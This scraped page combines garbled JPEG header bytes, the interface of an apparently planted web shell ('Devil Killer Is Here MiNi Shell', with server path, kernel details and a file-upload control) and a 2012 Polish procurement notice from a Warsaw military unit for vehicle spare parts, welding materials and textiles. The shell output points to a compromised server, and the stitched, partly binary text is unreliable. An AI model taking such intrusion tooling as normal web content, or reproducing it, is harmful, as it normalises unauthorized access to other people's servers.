JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121010/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121010/390910-N-2012.html

<p class="kh_header"><b>Warszawa: DOSTAWA CZĘŚCI ZAMIENNYCH DO SPRZĘTU MPS, CYSTERN MPS, DROBNEGO SPRZĘTU, WYPOSAŻENIA, MATERIAŁÓW EKSPLOATACYJNYCH, MATERIAŁÓW 
DO SPAWANIA I LUTOWANIA ORAZ MATERIAŁÓW TEKSTYLNYCH, numer sprawy D/252/09/2012</b><br>
<b>Numer ogłoszenia: 390910 - 2012; data zamieszczenia: 10.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa 4226 , Ul. Marsa 110, 04-470 Warszawa, woj. mazowieckie, tel. 22 6815 030, faks 22 6815 093.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Budżetowa - Podsektor Rządowy/Jednostka Wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA CZĘŚCI ZAMIENNYCH DO SPRZĘTU MPS, CYSTERN MPS, DROBNEGO SPRZĘTU, WYPOSAŻENIA, MATERIAŁÓW EKSPLOATACYJNYCH, MATERIAŁÓW 
DO SPAWANIA I LUTOWANIA ORAZ MATERIAŁÓW TEKSTYLNYCH, numer sprawy D/252/09/2012.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest dostawa  części zamiennych do sprzętu MPS, cystern MPS, drobnego sprzętu, wyposażenia, materiałów eksploatacyjnych, materiałów do spawania i lutowania oraz materiałów tekstylnych.
2.	Wymogi oraz szczegółowy opis przedmiotu zamówienia wyszczególniono w załączniku nr 1 do  SIWZ. Oferowany przedmiot zamówienia winien spełniać co najmniej funkcje i parametry przedstawione w załączniku nr 1 do SIWZ - określone jako parametry graniczne. 
3.	Zamawiający dopuszcza składanie ofert częściowych z podziałem na 6 części (zadania) - opis poszczególnych części zamówienia zawiera załącznika nr 1 do SIWZ. Wykonawca może złożyć ofertę na jedno, wybrane lub wszystkie (części) zadania.
4.	Zamawiający wymaga całkowitej realizacji ilości wyszczególnionych w zadaniu (oferta na cały asortyment w danym zadaniu)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 19.50.00.00-1, 31.68.00.00-6, 34.22.40.00-3, 39.56.35.10-4, 31.60.00.00-2, 39.50.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga zabezpieczenia oferty wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, które spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny. Do potwierdzenia oświadczeniem w załączniku nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie tego warunku, jeżeli Wykonawca w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonuje, minimum 1 (jedną) dostawę , odpowiadającą swoim rodzajem dostawie stanowiącej przedmiot zamówienia z podaniem wartości, przedmiotu, dat wykonania i odbiorców.  Wartość każdej (pojedynczej) dostawy  winna być nie mniejsza niż:
na zadanie 1 -   37 200,00 zł;
na zadanie 2 -    39 800,00zł;
na zadanie 3 -   34 000,00 zł;
na zadanie 4 -   31 500,00 zł;
na zadanie 5 -     3 200,00 zł;
na zadanie 6 -     5 400,00 zł;
Z wykorzystaniem wzoru - Załącznik nr 4 do SIWZ.
UWAGA
       Jeżeli Wykonawca składa ofertę na kilka części (zadań) jednocześnie, a na potwierdzenie spełnienia warunku posiada jedną dostawę, wartość tej dostawy  winna być nie mniejsza niż łączna wartość części (zadań) na które składana jest oferta. 
      W przypadku świadczeń okresowych lub ciągłych, wartość wykonanej dostawy  musi odpowiadać co najmniej kwocie zadania, na które Wykonawca składa ofertę.
      Za dostawy tego samego rodzaju zamawiający uzna dostawy przedmiotów 
o przeznaczeniu i funkcji tożsamej z przedmiotem zamówienia.
      W przypadku wartości dostaw  wyrażonej w innej walucie, Zamawiający, w celu oceny spełnienia ww. warunku, dokona przeliczenia tych wartości wg. kursu z dnia zawarcia umowy na podstawie Tabeli kursów średnich NBP publikowanych na stronie internetowej:
 http://www.nbp.pl/home.aspx?c=/ascx/archa.ascx</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, które spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny. Do potwierdzenia oświadczeniem w załączniku nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, które spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny. Do potwierdzenia oświadczeniem w załączniku nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek został spełniony, jeżeli Wykonawca posiada środki finansowe lub zdolność kredytową w wysokości nie mniejszej niż łącznie 151 100,00 PLN, w tym:
na zadanie 1 -   37 200,00 zł;
na zadanie 2 -    39 800,00zł;
na zadanie 3 -   34 000,00 zł;
na zadanie 4 -   31 500,00 zł;
na zadanie 5 -     3 200,00 zł;
na zadanie 6 -     5 400,00 zł;
  
 UWAGA
      Jeżeli Wykonawca składa ofertę na kilka części (zadań) jednocześnie, na potwierdzenie spełnienia niniejszego warunku, winien wykazać wartość posiadanych środków finansowych lub zdolności kredytowej w wysokości nie mniejszej niż łączna wartość części (zadań) na które składana jest oferta. 

Z wykorzystaniem wzoru - Załącznik nr 4 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Na podstawie art. 144 ustawy Pzp, zastrzega się dokonanie zmian treści umowy  w zakresie:
 - terminu zawarcia umowy;
 - zmiany miejsca świadczenia;
 - z powodu uzasadnionych zmian w zakresie sposobu wykonania  przedmiotu zamówienia proponowanego przez Zamawiającego lub Wykonawcę, jeżeli te zmiany są korzystne dla Zamawiającego;
 - z powodu okoliczności siły wyższej np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć z pewnością, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniu szkody 
w znacznych rozmiarach;
Wszelkie zmiany dotyczące treści umowy dokonywane będą w formie aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.2rblog.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba Zamawiającego: 04-470 Warszawa ul. Marsa 110 budynek nr 1 pokój nr 5..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.10.2012 godzina 08:30, miejsce: Siedziba Zamawiającego: 04-470 Warszawa ul. Marsa 110 (kancelaria ogólna) budynek nr 3 pokój nr 8..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie Nr 1 - DOSTAWA CZĘŚCI ZAMIENNYCH DO SPRZĘTU MPS, CYSTERN MPS, DROBNEGO SPRZĘTU, WYPOSAŻENIA, MATERIAŁÓW EKSPLOATACYJNYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Jelcz 662 pióra wycieraczek  102 1135 819 163, 570 000 040	szt.	10;
2.	Jelcz 662 Uszczelniacz piasty fi 160xfi 120 x 15/13	 szt	20;
3.	Jelcz 662 Zbiornik paliwa (WEBASTO) - 12l		szt.	5;
4.	Koszulka termokurczliwa 1m/6,4mm czarna		szt	200;
5.	Masa uszczelniająca DIRKO na bazie kauczuku silikonowego, odporność termiczna _50oC do -+180 oC w tubce  poj. 70 ml z końcówkami do nakładania z kartą bezpieczeństwa i kartą charakterystyki		szt.	18;
6.	Oring 100x5 NBR 70		szt. 20;
7.	Osłona falista gumowa 444.50.044		szt	10;
8.	Osłona sił. pneum. Fi 125	szt.	50;
9.	Pierścień oporowy z oringiem M22x1,5		szt.	500;
10.	Pierścień Oring 28x3		szt	20;
11.	Pierścień Oring 29x2 		szt	40;
12.	Pierścień simmera A18x30x7		szt	50;
13.	Pierścień uszczelniający 130x160x12 simering		szt	10;
14.	Pierścień uszczelniający 27-5-P PN 73173		szt.	500;
15.	Pierścień uszczelniający 35x5 Oring	szt	200;
16.	Pierścień uszczelniający A55x70x8		szt	50;
17.	Pierścień uszczelniający AS 85x110x13	szt	40;
18.	Pierścień uszczelniający zwolnicy fi 250x3 oring		szt	20;
19.	Przewód O 8 gumowy benzyno i olejo odporny 		mb.	100;
20.	Przewód olejowy zbrojony fi 12 Star		szt	20;
21.	Przewód powietrza fi 15 Tecalon		m	30;
22.	Star 266 pióro wycieraczki 561.000.031  	19500000-1	szt.	20
23.	Sznur gumowy NBR kalibrowany olejo i benzynoodporny  fi 2		mb	25;
24.	Sznur gumowy NBR kalibrowany olejo i benzynoodporny  fi 2,5		mb	25;
25.	Sznur gumowy NBR kalibrowany olejo i benzynoodporny  fi 3		mb	25;
26.	Sznur gumowy NBR kalibrowany olejo i benzynoodporny  fi 3,5		mb	25;
27.	Sznur gumowy NBR kalibrowany olejo i benzynoodporny  fi 4		mb	25;
28.	Sznur gumowy NBR kalibrowany olejo i benzynoodporny  fi 4,5		mb	25;
29.	Sznur gumowy NBR kalibrowany olejo i benzynoodporny  fi 5		mb	25;
30.	Sznur gumowy NBR kalibrowany olejo i benzynoodporny  fi 6		mb	50;
31.	Uszczelka szyby przedniej Jelcz 662	szt	2;
32.	Wąż fi 10 igielitowy, ciśnieniowy, do paliwa, przezroczysty,  wzmocniony oplotem.  1 MPa	mb	300;
33.	Wąż fi 12,5 gumowy, ciśnieniowy, do instalacji pneumatycznej zbrojony, wzmocniony podwójnym oplotem. - tzw z czerwonym paskiem 1 MPa		mb	100;
34.	Wąż gumowy ciśnieniowy układu wspomagania fi 25 - benzyno i olejoodporny 1 Mpa, temperatura          -30stCdo+50stC		mb	50
35.	Wąż gumowy fi 6 benzynoolejoodporny do 1 Mpa		mb	100;
36.	Zestaw naprawczy - uszczelki - do zaworów dennych producent Alfons HAAR - sterowane pneumatycznie PBVM 100/100 FL 90 LF-S		kpl	10;
37.	Zestaw naprawczy - uszczelki - do zaworów dennych TECNOMETAL - sterowane pneumatycznie (typ zaworu 89.00.05/B/F)		kpl	10;
38.	Zestaw naprawczy - uszczelki do zaworów dennych ALFONS HAAR - sterowane pneumatycznie (typ zaworu MBVM 100/100 FL 90)		kpl	10;
39.	Zestaw naprawczy - uszczelki do zaworów dennych TECNOMETAL - sterowane ręcznie linką (typ zaworu 21.00.00)		kpl	20;
40.	Zestaw naprawczy - uszczelki do zaworów MAPI typ ALFONS HAAR (API 100/A1)		kpl	10;
41.	Zestaw naprawczy - uszczelki do zaworów MAPI typ TECNOMETAL (98.00.04)		kpl	30;
42.	Zestaw naprawczy siłownik fi 100	19500000-1	szt.	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 19.50.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2 - DOSTAWA CZĘŚCI ZAMIENNYCH DO SPRZĘTU MPS, CYSTERN MPS, DROBNEGO SPRZĘTU, WYPOSAŻENIA, MATERIAŁÓW EKSPLOATACYJNYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Bezpiecznik samochodowy rurkowy  szklany 6,3A	szt	100;
2.	Gniazdo 15-wtykowe Gepfruth nacht GGVS/ADR Jelcz 662 w zderzaku przednim	kpl	3;
3.	Gniazdo wtykowe 13-biegunowe nr 7800452 1021029698525 podłaczenia przewodu spiralnego ciągnik siodłowy Jelcz 642 - cysterna naczepa	kpl	4;
4.	Gniazdo wtykowe 9-biegunowe nr 7800436 1021029698524 podłaczenia przewodu spiralnego ciągnik siodłowy Jelcz 642 - cysterna naczepa	kpl	4;
5.	Wkład reflektora HELLA 1AG 002395-38 02A02HC/12 T4WH4 Jelcz 662	szt	8;
6.	Przewód ABS 7-biegunowy WABCO 12834/03 4460082430 podłączenia ciągnik siodłowy Jelcz 642 - cysterna naczepa z wtykami	kpl	5;
7.	Przewód spiralny 13-żyłowy nr 9500014 1021029698522 podłączenia ciągnik siodłowy Jelcz 642 - cysterna naczepa z wtykami	kpl	5;
8.	Przewód spiralny 9-żyłowy podłączenia ciągnik siodłowy Jelcz 642 - cysterna naczepa z wtykami	kpl	5;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 31.68.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie Nr 3 - DOSTAWA CZĘŚCI ZAMIENNYCH DO SPRZĘTU MPS, CYSTERN MPS, DROBNEGO SPRZĘTU, WYPOSAŻENIA, MATERIAŁÓW EKSPLOATACYJNYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Hak pociągowy Jelcz 662 z atestem do 40 ton	szt	3;
2.	Koło kierownicze 44.0.34.215	szt	20;
3.	Koło kierownicze FI500   641 022 5170	szt.	5;
4.	Okładzina 32 07 572001 - 2204	szt	16;
5.	Pierścień osadczy sprężyna 60W	szt	50;
6.	Pompa wywrotu kabiny PTR 3.5 nr 6314590220	szt.	2;
7.	Resor przyczepy CP-4	szt	10;
8.	Sercówka liny 408.50.218	szt	20;
9.	Sprężyna dyszla D-46	szt	30;
10.	Sworzeń resoru 4610030240, 4610030219	szt.	10;
11.	Sworzeń resoru 4610030241 	szt.	10;
12.	Szyba przednia zwykła jednolita z uszczelką J-642	szt.	1;
13.	Tulejka 4610030206 	szt.	20;
14.	Wachacz resoru 6310030163	szt.	6;
15.	zawór hamulca ręcznego 1021029638897	szt	3;
16.	Zawór kulisty 1 1/4 	szt	20;
17.	Zawór przelotowy PBV 65/3 DFLT2x3-X1	szt.	5;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.22.40.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie Nr 4 - DOSTAWA CZĘŚCI ZAMIENNYCH DO SPRZĘTU MPS, CYSTERN MPS, DROBNEGO SPRZĘTU, WYPOSAŻENIA, MATERIAŁÓW EKSPLOATACYJNYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przewód ssawno-tłoczny fi 75 z końcówkami CAMLOK 3  męsko-męski z zaślepkami i łańcuchem łączącym dł. 6 mb  (z przejściem ładunków elektrostatycznych pomiędzy końcówkami)	szt	8; 
2.Przewód ssawno-tłoczny fi 75 z końcówkami CAMLOK 3  męsko-żeński z zaślepkami i łańcuchem łączącym dł. 6 mb (z przejściem ładunków elektrostatycznych pomiędzy końcówkami)	szt	8;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.56.35.10-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie Nr 5 - DOSTAWA MATERIAŁÓW 
DO SPAWANIA I LUTOWANIA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	drut spawaliniczy O 1,0 mm	kg	50;
2.	drut spawaliniczy O 1,2 mm	kg	25;
3.	drut spawaliniczy O 2,5 mm	kg	40;
4.	Elektroda ER 146 O 2,5 mm	szt	1120;
5.	Elektroda ER 146 O 3,25 mm	szt	990;
6.	Elektroda ER 146 O 2,0 mm	kg	700;
7.	Spoiwo srebrne paski LS-25 średnica 1,00 mm 	kg	6;
8.	drut cynowo-ołowiowy LC 60 O 1,00 mm	kg	6;
9.	spoiwo lutownicze z topnikiem O 0,8 mm S-Sn60Pb40	kg	4;
10.	Spoiwo lutownicze z topnikiem O 1,00 mm S-Sn60Pb40	kg	14;
11.	Spoiwo lutownicze z topnikiem O 1,2 mm S-Sn60Pb40	kg	5;
12.	Kalafonia 	kg	2;
13.	Taśma lakiernicza 50 mm	szt	300;
14.	Taśma lakiernicza 25 mm	szt	250;
15.	Taśma izolacyjna PCV	szt	120;
16.	Taśma elektroizolacyjna	szt	95;
17.	Taśma parciana do wiązek kabli lasotaśma 	szt	30;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 31.60.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie Nr 6 - DOSTAWA MATERIAŁÓW TEKSTYLNYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	filc biały w arkuszach	szt	125;
2.	flanela	mb	30;
3.	nici do skóry SYNTON 20 600m	szt	8;
4.	nici 480x3	szt	8;
5.	nici ARES 6 czarne	szt	8;
6.	linka Pa 8 mm	mb	300;
7.	taśma brezentowa 40 mm	mb	100;
8.	Sznurek 3,2 (kolor biały)	mb	2500;
9.	taśma brezentowa khaki 40	mb	100;
